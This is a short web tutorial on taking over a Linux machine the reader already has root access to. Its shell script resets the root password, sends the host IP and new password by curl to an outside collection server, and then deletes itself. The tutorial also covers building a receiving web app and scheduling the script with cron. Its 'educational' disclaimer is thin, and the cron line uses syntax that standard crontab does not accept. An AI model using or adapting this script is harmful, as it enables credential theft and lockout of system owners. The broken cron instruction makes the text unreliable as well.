Hacking Linux System Using Shell Script article is published For Educational Purposes Only.
Hereby assuming that you already got a root user’s access to the target system for shorter period which you want to hack.
- Instering a shell script code to target system.
- Make script executable.
- Writting an appplication which can accept system IP and Password at http protocol.
- Insert cronjob to execute script only once.
Instering a shell script code to target system
Create file with any name, for example myscript.sh
#!/bin/sh IPS=$(hostname -I) PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 20) IPS=$(echo $IPS | sed 's/ /%20/g') echo $PASSWORD >> /var/log/passwordiscript.log echo "root:$PASSWORD" | chpasswd curl -X GET "http://192.168.1.100:8080/collectdata?ip=$IPS&password=$PASSWORD"; >> /var/log/passwordiscript.log ##ToForceChangeRootPassword## passwd -e root ##ToForceChangeRootPassword## #delete the script after submitting at URL rm -- "$0"
This script will gather information like system IP address and password, data will be submitted to your provided url using curl, root user’s password will be changed before submitting data to URL.
Make script executable
Set file permissions to make file executable.
# chmod 755 /your_path/myscript.sh
Writting an appplication which can accept system IP and Password at http protocol
Write your own web application to accept IP address and password at query string. Further within application store hacked IP and password to database OR email it. Here in above script webserver started at port 8080 with an server address 192.168.1.100. Using this webserver data is accpted at URL http://192.168.1.100:8080/collectdata?ip=$IPS&password=$PASSWORD
Insert cronjob to execute script only once.
User crontabl -e command to add new cronjob. To execute a command on 20th November 2019 at midnight add cron as follow:
0 0 20 11 ? 2019 /your_path/myscript.sh